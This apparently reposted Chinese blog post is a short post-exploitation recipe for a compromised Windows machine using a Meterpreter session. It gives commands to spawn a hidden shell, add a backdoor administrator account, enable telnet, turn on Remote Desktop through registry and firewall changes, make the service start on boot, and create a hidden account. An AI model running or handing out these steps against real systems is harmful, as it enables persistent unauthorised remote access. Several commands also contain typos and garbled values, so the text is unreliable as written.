获得shell 、启用远程服务

 1.获得meterpreter回话

 2.execute -H -f cmd -i  执行时,创建一个交互命令shell(-i),该shell充当隐藏的进程(-H)。

 3.创建用户 C:\ net use Service_Account password /add

      C:\ net localgroup administrator Service_Accountt /add

 4.开启telnet    run gettelnet  -e

  

启用远程Windows 终端服务

  在交换式shell中修改注册表

    C:\ reg add "hklm\system\currentControlSet\Control\TerminalServer" /v "AllowTSConnections" /t REG_DWORD /d 0*1 /f

    C:\ reg add "hklm\system\currentControlSet\Control\TerminalServer"  /v "fDenyTSConnections" /t REG_DWORD  /d 0*0 /f

   为了确保RDP协议能够通过客户端的防火墙。添加一条规则:

    C:\  netshadvfirewall   firewall  set rule group =" remote desktop" new enable=Yes

  开启RDP服务:

    C:\  net start Terservice

  这样启动没有持久性。开机自启:

    C:\ sc configTermService start=auto

    创建隐藏账户:

    run getgui -u  Service_Account -p pa$$word

  

    

    

转载于:https://www.cnblogs.com/pangya/p/7940720.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值